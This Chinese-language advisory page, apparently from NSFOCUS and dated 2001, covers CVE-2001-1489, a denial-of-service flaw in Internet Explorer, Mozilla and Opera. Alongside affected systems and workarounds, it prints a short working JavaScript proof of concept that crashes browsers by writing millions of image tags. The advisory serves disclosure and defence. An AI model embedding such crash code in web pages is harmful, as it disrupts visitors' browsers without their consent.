首页 -> 安全研究
安全研究
安全漏洞
多家厂商Web浏览器图象计数拒绝服务漏洞
发布日期:2001-12-12
更新日期:2001-12-18
受影响系统:
Microsoft Internet Explorer 6.0描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Mozilla Browser 0.9.6
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0
- BeOS 5.0
- BSDI BSD/OS 4.2
- Compaq OpenVMS 7.3 Alpha
- Compaq OpenVMS 7.2-2
- Compaq OpenVMS 7.2-2 Alpha
- Compaq OpenVMS 7.1-2
- Compaq OpenVMS 7.1-2 Alpha
- FreeBSD 4.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- RedHat Linux 7.0 x86
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 sparc
- RedHat Linux 6.0 ia64
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- SGI IRIX 6.5
- Sun Solaris 8.0
- Sun Solaris 7.0
Opera Software Opera Web Browser 5.11 win32
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
BUGTRAQ ID: 3684
CVE(CAN) ID: CVE-2001-1489
多家厂商的浏览器(包括Mozilla、Opera、IE等等)对意外情况的处理存在安全问题,可能导致拒绝服务攻击。
使用这些浏览器的用户在浏览存在大量图象计数的网页时会受到这种攻击而导致浏览器崩溃。
<*来源:Pavel Titov (Pavel.Titov@mtu-net.ru)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-12/0124.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>
访问包含有以上代码的HTML页面时,有漏洞的Web浏览器会崩溃。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 换用其它安全的浏览器。
* 只用这些浏览器浏览信任站点。
* 通过设置禁止运行JavaScript脚本。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com
浏览次数:10277
严重程度:0(网友投票)
绿盟科技给您安全的保障